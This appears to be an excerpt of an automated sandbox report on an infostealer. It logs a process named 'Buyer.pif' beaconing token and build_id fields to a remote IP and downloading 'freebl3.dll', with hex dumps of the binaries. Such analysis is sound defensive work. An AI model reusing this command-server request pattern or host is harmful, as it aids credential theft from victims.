                                                                                                  Cache-Control: no-store, no-cache
                                                                                                  Accept-Ranges: bytes
                                                                                                  2024-07-26 17:58:21 UTC16123INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00
                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY
                                                                                                  2024-07-26 17:58:21 UTC16384INData Raw: 00 e9 9c 25 1b 00 e9 3a f0 19 00 e9 9e cd 1e 00 e9 ba 58 1d 00 e9 7e 65 1b 00 e9 1b f0 1c 00 e9 01 21 1c 00 e9 b9 2a 1f 00 e9 d7 46 00 00 e9 92 83 17 00 e9 c5 ed 1e 00 e9 e8 57 03 00 e9 fa 7c 1b 00 e9 3e e1 00 00 e9 bd f4 1a 00 e9 b4 7c 00 00 e9 bf ca 1c 00 e9 4c db 1a 00 e9 31 31 1a 00 e9 34 e5 1c 00 e9 36 f1 1d 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                  Data Ascii: %:X~e!*FW|>|L1146
                                                                                                  2024-07-26 17:58:21 UTC16384INData Raw: c3 0f 1f 40 00 8a 10 3a 11 75 1a 84 d2 74 12 8a 50 01 3a 51 01 75 0e 83 c0 02 83 c1 02 84 d2 75 e4 33 c0 eb 05 1b c0 83 c8 01 85 c0 74 15 83 c6 0c 47 81 fe c0 03 00 00 72 bf 5f 5e b8 0c 00 00 00 5b c3 8d 0c 7f 8b 14 8d 38 25 24 10 8d 04 8d 34 25 24 10 85 d2 75 09 8b 10 89 14 8d 38 25 24 10 8b 4c 24 18 85 c9 5f 0f 44 ca 5e 89 08 33 c0 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 33 ff 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 53 6a 02 6a ff ff 74 24 1c 56 e8 78 0c 15 00 8b d8 83 c4 10 85 db 74 21 6a 00 ff 74 24 24 ff 74 24 24 ff 74 24 24 53 56 e8 9a 68 04 00 53 56 8b f8
                                                                                                  Data Ascii: @:utP:Quu3tGr_^[8%$4%$u8%$L$_D^3[Vt$W3FtPh $Sjjt$Vxt!jt$$t$$t$$SVhSV
                                                                                                  2024-07-26 17:58:21 UTC16384INData Raw: 77 12 8d 1c 9b 46 8d 5b e8 8d 1c 59 0f be 0e 83 f9 30 7d e9 89 74 24 74 81 e3 ff ff ff 7f 89 5c 24 30 83 f9 6c 75 35 4e 0f be 4e 01 46 89 74 24 74 85 c9 0f 85 f0 fd ff ff eb 21 0f be 4e 01 46 c6 44 24 37 01 89 74 24 74 83 f9 6c 75 0e 0f be 4e 01 46 89 74 24 74 c6 44 24 37 02 8b 44 24 38 33 f6 89 44 24 58 ba 70 53 21 10 c7 44 24 50 70 53 21 10 c6 44 24 2e 11 0f be 02 3b c8 74 16 83 c2 06 46 81 fa fa 53 21 10 7c ed 8a 4c 24 2e 8b 54 24 50 eb 19 8d 04 76 8a 0c 45 73 53 21 10 8d 14 45 70 53 21 10 89 54 24 50 88 4c 24 2e 0f b6 c1 83 f8 10 0f 87 d9 14 00 00 ff 24 85 24 e1 00 10 c6 44 24 37 01 c6 44 24 43 00 f6 42 02 01 0f 84 97 00 00 00 80 7c 24 2d 00 74 44 8b 74 24 70 8b 56 04 39 16 7f 22 0f 57 c0 66 0f 13 44 24 68 8b 4c 24 6c 8b 74 24 68 8a 54 24 35 89 74 24
                                                                                                  Data Ascii: wF[Y0}t$t\$0lu5NNFt$t!NFD$7t$tluNFt$tD$7D$83D$XpS!D$PpS!D$.;tFS!|L$.T$PvEsS!EpS!T$PL$.$$D$7D$CB|$-tDt$pV9"WfD$hL$lt$hT$5t$
                                                                                                  2024-07-26 17:58:21 UTC16384INData Raw: 20 89 44 24 24 3b c2 7f 0c 7c 18 8b 44 24 14 3b c8 73 06 eb 0e 8b 44 24 14 8b c8 89 44 24 20 89 54 24 24 a1 08 22 24 10 03 44 24 10 99 8b f8 8b ea 85 f6 0f 85 6b 01 00 00 3b 6c 24 24 0f 8f 91 00 00 00 7c 08 3b f9 0f 83 87 00 00 00 8b 44 24 10 99 6a 00 8b ca c7 44 24 48 00 00 00 00 8d 54 24 48 89 44 24 38 52 51 50 55 57 89 4c 24 50 e8 38 3a ff ff 40 50 8b 44 24 34 50 8b 80 dc 00 00 00 ff d0 8b f0 83 c4 10 85 f6 75 1e 8b 54 24 1c 8b 44 24 44 55 57 ff 74 24 18 8b 0a ff 70 04 52 8b 41 0c ff d0 83 c4 14 8b f0 8b 44 24 44 85 c0 74 09 50 e8 dd f4 12 00 83 c4 04 03 7c 24 34 8b 4c 24 20 13 6c 24 38 85 f6 0f 84 6a ff ff ff e9 d0 00 00 00 8b 7c 24 1c 8d 4c 24 38 51 57 8b 07 8b 40 18 ff d0 8b f0 83 c4 08 85 f6 0f 85 b2 00 00 00 8b 4c 24 2c 39 4c 24 3c 7c 1e 7f 0a 8b
                                                                                                  Data Ascii: D$$;|D$;sD$D$ T$$"$D$k;l$$|;D$jD$HT$HD$8RQPUWL$P8:@PD$4PuT$D$DUWt$pRAD$DtP|$4L$ l$8j|$L$8QW@L$,9L$<|
                                                                                                  2024-07-26 17:58:21 UTC16384INData Raw: 10 be 07 00 00 00 eb 32 c7 40 08 01 00 00 00 33 ff c7 40 0c 00 00 00 00 66 c7 40 11 01 00 8b 44 24 10 56 89 46 40 e8 3a 27 0d 00 83 c4 04 8b f0 eb 08 8b 7c 24 10 8b 74 24 0c 85 ff 0f 84 9d 00 00 00 83 47 10 ff 0f 85 93 00 00 00 ff 4b 3c 83 7f 08 01 75 0d 83 7f 0c 00 75 07 c7 43 1c ff ff ff ff 8b 07 85 c0 74 0e 50 53 e8 46 87 0a 00 83 c4 08 85 c0 75 0a 57 53 e8 38 88 0a 00 83 c4 08 57 53 e8 5e 81 0a 00 83 c4 08 83 3d 18 20 24 10 00 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 57 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 57 ff 15 3c 20 24 10 a1 38 82 24 10 83 c4 08 85 c0 74 13 50 ff 15 70 20 24 10 eb 07 57 ff 15 3c 20 24 10 83 c4 04 53 e8 a0 17 0d 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                  Data Ascii: 2@3@f@D$VF@:'|$t$GK<uuCtPSFuWS8WS^= $tB8$tPh $WD $)$$W< $8$tPp $W< $S_^[]
                                                                                                  2024-07-26 17:58:21 UTC16384INData Raw: c4 04 85 f6 74 64 8b 7c 24 14 e9 68 fe ff ff 0f b7 86 90 00 00 00 8b de 8b 54 24 10 8b 4c 24 24 8b 6c 24 20 89 47 10 8b 86 98 00 00 00 c1 e8 06 83 e0 01 89 54 24 10 89 47 14 80 bb 97 00 00 00 02 89 4c 24 14 0f 85 c8 fe ff ff b8 01 00 00 00 89 4c 24 14 89 54 24 10 e9 b8 fe ff ff 5f 5e 5d b8 07 00 00 00 5b 83 c4 18 c3 5f 5e 5d 33 c0 5b 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                                  Data Ascii: td|$hT$L$$l$ GT$GL$L$T$_^][_^]3[
                                                                                                  2024-07-26 17:58:21 UTC16384INData Raw: c4 18 5f 5e 5d 5b 59 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 7c 24 14 8b 46 10 8b 56 0c 8d 0c 80 8b 42 68 ff 74 88 fc ff 77 04 ff 37 e8 ac f3 11 00 83 c4 0c 85 c0 74 0b ff 37 56 e8 d3 67 fe ff 83 c4 08 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 2c 67 21 10 ff 74 24 14 e8 bc d7 0d 00 83 c4 14 c3 cc cc
                                                                                                  Data Ascii: _^][YVt$W|$FVBhtw7t7Vg_^jjjh,g!t$
                                                                                                  2024-07-26 17:58:21 UTC16384INData Raw: 2c ff 46 2c 5e c3 8b 4c 24 0c 33 d2 8b 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00 d3 e2 8b
                                                                                                  Data Ascii: ,F,^L$3qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^|$u|$u_^3ARt$t$PA8tuL$
                                                                                                  2024-07-26 17:58:21 UTC16384INData Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10
                                                                                                  Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW|$mw<(6XvutT9 $tB8$tPh $VD $)$$


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  8192.168.2.5497185.75.212.604432380C:\Users\user\AppData\Local\Temp\447331\Buyer.pif
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-07-26 17:58:23 UTC322OUTPOST / HTTP/1.1
                                                                                                  Content-Type: multipart/form-data; boundary=----JKJDAEBFCBKECBGDBFCF
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                                  Host: 5.75.212.60
                                                                                                  Content-Length: 829
                                                                                                  Connection: Keep-Alive
                                                                                                  Cache-Control: no-cache
                                                                                                  2024-07-26 17:58:23 UTC829OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 4a 44 41 45 42 46 43 42 4b 45 43 42 47 44 42 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 37 65 61 65 63 62 63 34 38 63 32 31 31 31 65 66 35 64 63 33 32 37 37 30 65 31 30 31 30 31 38 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4a 44 41 45 42 46 43 42 4b 45 43 42 47 44 42 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 61 37 32 65 62 30 36 39 33 39 65 61 34 37 38 37 35 33 64 35 63 34 64 66 34 62 32 62 64 33 32 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4a 44 41 45 42 46 43 42 4b 45 43 42 47 44 42 46 43 46 0d 0a 43 6f 6e 74
                                                                                                  Data Ascii: ------JKJDAEBFCBKECBGDBFCFContent-Disposition: form-data; name="token"77eaecbc48c2111ef5dc32770e101018------JKJDAEBFCBKECBGDBFCFContent-Disposition: form-data; name="build_id"1a72eb06939ea478753d5c4df4b2bd32------JKJDAEBFCBKECBGDBFCFCont
                                                                                                  2024-07-26 17:58:24 UTC158INHTTP/1.1 200 OK
                                                                                                  Server: nginx
                                                                                                  Date: Fri, 26 Jul 2024 17:58:24 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  2024-07-26 17:58:24 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                  Data Ascii: 2ok0


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  9192.168.2.5497195.75.212.604432380C:\Users\user\AppData\Local\Temp\447331\Buyer.pif
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-07-26 17:58:24 UTC322OUTPOST / HTTP/1.1
                                                                                                  Content-Type: multipart/form-data; boundary=----BKJKJEHJJDAKECBFCGID
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                                  Host: 5.75.212.60
                                                                                                  Content-Length: 437
                                                                                                  Connection: Keep-Alive
                                                                                                  Cache-Control: no-cache
                                                                                                  2024-07-26 17:58:24 UTC437OUTData Raw: 2d 2d 2d 2d 2d 2d 42 4b 4a 4b 4a 45 48 4a 4a 44 41 4b 45 43 42 46 43 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 37 65 61 65 63 62 63 34 38 63 32 31 31 31 65 66 35 64 63 33 32 37 37 30 65 31 30 31 30 31 38 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4a 4b 4a 45 48 4a 4a 44 41 4b 45 43 42 46 43 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 61 37 32 65 62 30 36 39 33 39 65 61 34 37 38 37 35 33 64 35 63 34 64 66 34 62 32 62 64 33 32 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4a 4b 4a 45 48 4a 4a 44 41 4b 45 43 42 46 43 47 49 44 0d 0a 43 6f 6e 74
                                                                                                  Data Ascii: ------BKJKJEHJJDAKECBFCGIDContent-Disposition: form-data; name="token"77eaecbc48c2111ef5dc32770e101018------BKJKJEHJJDAKECBFCGIDContent-Disposition: form-data; name="build_id"1a72eb06939ea478753d5c4df4b2bd32------BKJKJEHJJDAKECBFCGIDCont
                                                                                                  2024-07-26 17:58:25 UTC158INHTTP/1.1 200 OK
                                                                                                  Server: nginx
                                                                                                  Date: Fri, 26 Jul 2024 17:58:25 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  2024-07-26 17:58:25 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                  Data Ascii: 2ok0


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  10192.168.2.5497205.75.212.604432380C:\Users\user\AppData\Local\Temp\447331\Buyer.pif
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-07-26 17:58:25 UTC322OUTPOST / HTTP/1.1
                                                                                                  Content-Type: multipart/form-data; boundary=----DHJEBGIEBFIJKEBFBFHI
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                                  Host: 5.75.212.60
                                                                                                  Content-Length: 437
                                                                                                  Connection: Keep-Alive
                                                                                                  Cache-Control: no-cache
                                                                                                  2024-07-26 17:58:25 UTC437OUTData Raw: 2d 2d 2d 2d 2d 2d 44 48 4a 45 42 47 49 45 42 46 49 4a 4b 45 42 46 42 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 37 65 61 65 63 62 63 34 38 63 32 31 31 31 65 66 35 64 63 33 32 37 37 30 65 31 30 31 30 31 38 0d 0a 2d 2d 2d 2d 2d 2d 44 48 4a 45 42 47 49 45 42 46 49 4a 4b 45 42 46 42 46 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 31 61 37 32 65 62 30 36 39 33 39 65 61 34 37 38 37 35 33 64 35 63 34 64 66 34 62 32 62 64 33 32 0d 0a 2d 2d 2d 2d 2d 2d 44 48 4a 45 42 47 49 45 42 46 49 4a 4b 45 42 46 42 46 48 49 0d 0a 43 6f 6e 74
                                                                                                  Data Ascii: ------DHJEBGIEBFIJKEBFBFHIContent-Disposition: form-data; name="token"77eaecbc48c2111ef5dc32770e101018------DHJEBGIEBFIJKEBFBFHIContent-Disposition: form-data; name="build_id"1a72eb06939ea478753d5c4df4b2bd32------DHJEBGIEBFIJKEBFBFHICont
                                                                                                  2024-07-26 17:58:26 UTC158INHTTP/1.1 200 OK
                                                                                                  Server: nginx
                                                                                                  Date: Fri, 26 Jul 2024 17:58:26 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  2024-07-26 17:58:26 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                  Data Ascii: 2ok0


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  11192.168.2.5497215.75.212.604432380C:\Users\user\AppData\Local\Temp\447331\Buyer.pif
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-07-26 17:58:27 UTC241OUTGET /freebl3.dll HTTP/1.1
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                                                  Host: 5.75.212.60
                                                                                                  Connection: Keep-Alive
                                                                                                  Cache-Control: no-cache
                                                                                                  2024-07-26 17:58:27 UTC260INHTTP/1.1 200 OK
                                                                                                  Server: nginx
                                                                                                  Date: Fri, 26 Jul 2024 17:58:27 GMT
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Length: 685392
                                                                                                  Connection: close
                                                                                                  Last-Modified: Friday, 26-Jul-2024 17:58:27 GMT
                                                                                                  Cache-Control: no-store, no-cache
                                                                                                  Accept-Ranges: bytes
                                                                                                  2024-07-26 17:58:27 UTC16124INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00
                                                                                                  Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHS
                                                                                                  2024-07-26 17:58:27 UTC16384INData Raw: ff 13 bd 10 ff ff ff 01 c8 89 45 b4 11 df 89 7d c8 89 f2 31 fa 8b 4d 98 31 c1 89 ce 0f a4 d6 10 89 b5 58 ff ff ff 0f ac d1 10 89 4d 98 8b 7d ec 01 cf 89 7d ec 8b 55 e0 11 f2 89 55 e0 31 d3 8b 4d 8c 31 f9 89 da 0f a4 ca 01 89 55 88 0f a4 d9 01 89 4d 8c 8b 5d d4 03 9d 20 ff ff ff 8b 45 cc 13 85 48 ff ff ff 03 5d 94 13 45 9c 89 45 cc 8b bd 7c ff ff ff 31 c7 8b 45 a8 31 d8 89 45 a8 8b 4d c4 01 f9 89 4d c4 8b 75 bc 11 c6 89 75 bc 8b 55 94 31 ca 8b 4d 9c 31 f1 89 d0 0f a4 c8 08 0f a4 d1 08 89 4d 9c 03 9d 04 ff ff ff 8b 75 cc 13 b5 08 ff ff ff 01 cb 89 5d d4 11 c6 89 75 cc 8b 4d a8 31 f1 31 df 89 fa 0f a4 ca 10 89 55 94 0f ac cf 10 89 bd 7c ff ff ff 8b 75 c4 01 fe 89 75 c4 8b 4d bc 11 d1 89 4d bc 31 c8 8b 5d 9c 31 f3 89 c1 0f a4 d9 01 89 8d 78 ff ff ff 0f a4 c3
                                                                                                  Data Ascii: E}1M1XM}}UU1M1UM] EH]EE|1E1EMMuuU1M1Mu]uM11U|uuMM1]1x
                                                                                                  2024-07-26 17:58:27 UTC16384INData Raw: 08 89 88 90 00 00 00 31 d6 89 b0 9c 00 00 00 89 90 98 00 00 00 8b 4d e8 89 fa 31 ca c1 c2 08 31 d1 89 d6 89 88 a4 00 00 00 8b 4d d8 8b 55 d4 31 ca c1 c2 08 89 b0 a0 00 00 00 31 d1 89 88 ac 00 00 00 89 90 a8 00 00 00 8b 4d c0 8b 55 c4 31 d1 c1 c1 08 31 ca 89 90 b4 00 00 00 8b 95 54 ff ff ff 8b 75 bc 31 d6 c1 c6 08 89 88 b0 00 00 00 31 f2 89 90 bc 00 00 00 89 b0 b8 00 00 00 81 c4 d8 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 00 01 00 00 89 95 78 ff ff ff 89 cf ff 31 e8 a2 90 07 00 83 c4 04 89 45 bc ff 77 04 e8 94 90 07 00 83 c4 04 89 45 b8 ff 77 08 e8 86 90 07 00 83 c4 04 89 45 c0 ff 77 0c e8 78 90 07 00 83 c4 04 89 45 dc ff 77 10 e8 6a 90 07 00 83 c4 04 89 c6 ff 77 14 e8 5d 90 07 00 83 c4 04 89 c3 ff 77 18 e8 50 90
                                                                                                  Data Ascii: 1M11MU11MU11Tu11^_[]USWVx1EwEwEwxEwjw]wP
                                                                                                  2024-07-26 17:58:27 UTC16384INData Raw: 83 c4 0c 8a 87 18 01 00 00 30 03 8a 87 19 01 00 00 30 43 01 8a 87 1a 01 00 00 30 43 02 8a 87 1b 01 00 00 30 43 03 8a 87 1c 01 00 00 30 43 04 8a 87 1d 01 00 00 30 43 05 8a 87 1e 01 00 00 30 43 06 8a 87 1f 01 00 00 30 43 07 8a 87 20 01 00 00 30 43 08 8a 87 21 01 00 00 30 43 09 8a 87 22 01 00 00 30 43 0a 8a 87 23 01 00 00 30 43 0b 8a 87 24 01 00 00 30 43 0c 8a 87 25 01 00 00 30 43 0d 8a 87 26 01 00 00 30 43 0e 8a 87 27 01 00 00 30 43 0f 0f 10 45 e0 0f 11 87 18 01 00 00 8b 4d f0 31 e9 e8 ad 4e 07 00 31 c0 83 c4 1c 5e 5f 5b 5d c3 cc cc cc 55 89 e5 68 28 01 00 00 e8 42 50 07 00 83 c4 04 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 24 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 85 c9 74 50 8b 45 10 8d 50 f0 83 fa 10 77 45 be 01 01 01 00 0f
                                                                                                  Data Ascii: 00C0C0C0C0C0C0C 0C!0C"0C#0C$0C%0C&0C'0CEM1N1^_[]Uh(BP]USWV$M01EtPEPwE
